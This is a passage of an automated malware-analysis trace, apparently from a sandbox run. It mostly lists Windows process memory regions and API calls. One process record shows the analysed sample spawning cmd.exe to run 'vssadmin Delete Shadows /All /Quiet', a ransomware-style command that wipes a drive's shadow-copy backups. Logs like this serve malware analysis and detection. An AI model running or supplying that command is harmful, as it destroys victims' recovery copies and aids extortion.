	          end_va = 0x1ae440d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae440d0000"
	        filename = ""

Region:
	              id = 5175
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 5176
	        start_va = 0x1ae441c0000
	          end_va = 0x1ae441c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae441c0000"
	        filename = ""

Region:
	              id = 5177
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 5178
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 5179
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 5180
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 5181
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 5182
	        start_va = 0x1ae441d0000
	          end_va = 0x1ae441d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae441d0000"
	        filename = ""

Region:
	              id = 5183
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 5184
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 5185
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 5186
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 5187
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 5202
	        start_va = 0x1ae441e0000
	          end_va = 0x1ae441e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae441e0000"
	        filename = ""

Region:
	              id = 5203
	        start_va = 0x1ae441f0000
	          end_va = 0x1ae441f0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae441f0000"
	        filename = ""

Region:
	              id = 5204
	        start_va = 0x1ae443d0000
	          end_va = 0x1ae44557fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae443d0000"
	        filename = ""

Region:
	              id = 5205
	        start_va = 0x1ae44570000
	          end_va = 0x1ae4457ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae44570000"
	        filename = ""

Region:
	              id = 5206
	        start_va = 0x1ae44580000
	          end_va = 0x1ae44700fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae44580000"
	        filename = ""

Region:
	              id = 5207
	        start_va = 0x1ae44710000
	          end_va = 0x1ae45b0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae44710000"
	        filename = ""

Region:
	              id = 5208
	        start_va = 0x1ae45b10000
	          end_va = 0x1ae45caffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae45b10000"
	        filename = ""

Region:
	              id = 5218
	        start_va = 0xaaef310000
	          end_va = 0xaaef34ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaef310000"
	        filename = ""

Region:
	              id = 5219
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 5220
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 5230
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 5231
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 5232
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 5233
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 5234
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 5235
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 5245
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 5246
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 5247
	        start_va = 0x1ae44200000
	          end_va = 0x1ae4420ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae44200000"
	        filename = ""

Region:
	              id = 5249
	        start_va = 0x1ae45cb0000
	          end_va = 0x1ae45fe6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5250
	        start_va = 0x1ae44210000
	          end_va = 0x1ae44269fff
	       monitored = 1
	     entry_point = 0x1ae442253f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5251
	        start_va = 0x1ae44270000
	          end_va = 0x1ae44290fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5252
	        start_va = 0x1ae45ff0000
	          end_va = 0x1ae46203fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae45ff0000"
	        filename = ""

Region:
	              id = 5253
	        start_va = 0x1ae46210000
	          end_va = 0x1ae46426fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae46210000"
	        filename = ""

Region:
	              id = 5256
	        start_va = 0x1ae45b10000
	          end_va = 0x1ae45c27fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae45b10000"
	        filename = ""

Region:
	              id = 5257
	        start_va = 0x1ae45ca0000
	          end_va = 0x1ae45caffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae45ca0000"
	        filename = ""

Region:
	              id = 5258
	        start_va = 0x1ae46430000
	          end_va = 0x1ae4664dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae46430000"
	        filename = ""

Region:
	              id = 5259
	        start_va = 0x1ae46650000
	          end_va = 0x1ae4675afff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae46650000"
	        filename = ""

Region:
	              id = 5263
	        start_va = 0xaaef350000
	          end_va = 0xaaef38ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaef350000"
	        filename = ""

Region:
	              id = 5264
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 5265
	        start_va = 0x1ae44210000
	          end_va = 0x1ae44210fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae44210000"
	        filename = ""

Region:
	              id = 5266
	        start_va = 0x1ae44210000
	          end_va = 0x1ae442cbfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae44210000"
	        filename = ""

Region:
	              id = 5267
	        start_va = 0x1ae44560000
	          end_va = 0x1ae44563fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae44560000"
	        filename = ""

Region:
	              id = 5268
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 5269
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 5270
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 5271
	        start_va = 0x1ae45c30000
	          end_va = 0x1ae45c36fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001ae45c30000"
	        filename = ""

Region:
	              id = 5272
	        start_va = 0x1ae45c40000
	          end_va = 0x1ae45c40fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae45c40000"
	        filename = ""

Region:
	              id = 5273
	        start_va = 0x1ae45c50000
	          end_va = 0x1ae45c50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae45c50000"
	        filename = ""

Region:
	              id = 5274
	        start_va = 0x1ae45c60000
	          end_va = 0x1ae45c64fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 5275
	        start_va = 0x1ae45c70000
	          end_va = 0x1ae45c70fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 5276
	        start_va = 0x1ae45c80000
	          end_va = 0x1ae45c81fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae45c80000"
	        filename = ""

Region:
	              id = 5277
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 5278
	        start_va = 0x1ae45c90000
	          end_va = 0x1ae45c90fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 5279
	        start_va = 0x1ae46760000
	          end_va = 0x1ae46761fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001ae46760000"
	        filename = ""


Thread:
	id = 380
	os_tid = 0x224


Thread:
	id = 381
	os_tid = 0x8bc


Thread:
	id = 384
	os_tid = 0xc88


Thread:
	id = 387
	os_tid = 0x32c


Process:
	id = "71"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2a721000"
	os_pid = "0x13c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=F: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5295
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5296
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5297
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5298
	        start_va = 0x160000
	          end_va = 0x161fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000160000"
	        filename = ""

Region:
	              id = 5299
	        start_va = 0x170000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000170000"
	        filename = ""

Region:
	              id = 5300
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 5301
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 5302
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 5303
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5304
	        start_va = 0x7f720000
	          end_va = 0x7f742fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f720000"
	        filename = ""

Region:
	              id = 5305
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5306
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5307
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5308
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5309
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5310
	        start_va = 0x90000
	          end_va = 0x93fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000090000"
	        filename = ""

Region:
	              id = 5311
	        start_va = 0xa0000
	          end_va = 0xa0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000a0000"
	        filename = ""

Region:
	              id = 5312
	        start_va = 0xb0000
	          end_va = 0xb1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000b0000"
	        filename = ""

Region:
	              id = 5313
	        start_va = 0x4600000
	          end_va = 0x46effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5314
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5315
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5316
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5317
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5318
	        start_va = 0x46f0000
	          end_va = 0x498ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046f0000"
	        filename = ""

Region:
	              id = 5319
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5320
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5322
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5323
	        start_va = 0x7f620000
	          end_va = 0x7f71ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f620000"
	        filename = ""

Region:
	              id = 5479
	        start_va = 0x4600000
	          end_va = 0x46bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5480
	        start_va = 0x46e0000
	          end_va = 0x46effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046e0000"
	        filename = ""

Region:
	              id = 5481
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5482
	        start_va = 0xc0000
	          end_va = 0xfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000c0000"
	        filename = ""

Region:
	              id = 5483
	        start_va = 0x46f0000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046f0000"
	        filename = ""

Region:
	              id = 5484
	        start_va = 0x4890000
	          end_va = 0x498ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004890000"
	        filename = ""

Region:
	              id = 5485
	        start_va = 0x4990000
	          end_va = 0x4b6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004990000"
	        filename = ""

Region:
	              id = 5486
	        start_va = 0x160000
	          end_va = 0x163fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000160000"
	        filename = ""

Region:
	              id = 5522
	        start_va = 0x270000
	          end_va = 0x273fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000270000"
	        filename = ""

Region:
	              id = 5561
	        start_va = 0x4b70000
	          end_va = 0x4ea6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 389
	os_tid = 0xd38

	[0313.878] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0313.879] GetProcessHeap () returned 0x4890000
	[0313.879] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x400a) returned 0x489b998
	[0313.879] GetProcessHeap () returned 0x4890000
	[0313.880] RtlFreeHeap (HeapHandle=0x4890000, Flags=0x0, BaseAddress=0x489b998) returned 1
	[0313.882] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0313.882] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0313.882] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0313.882] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0313.882] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0313.882] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0313.882] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0313.882] GetProcessHeap () returned 0x4890000
	[0313.882] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x58) returned 0x4899048
	[0313.883] GetProcessHeap () returned 0x4890000
	[0313.883] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x1a) returned 0x4897318
	[0313.885] GetProcessHeap () returned 0x4890000
	[0313.885] RtlAllocateHeap (HeapHandle=0x4890000, Flags=0x8, Size=0x52) returned 0x48990a8
	[0313.889] GetConsoleTitleW (in: lpConsoleTitle=0x26f348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0313.984] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0313.984] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0313.984] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0313.984] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0313.985] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0313.986] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0313.987] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
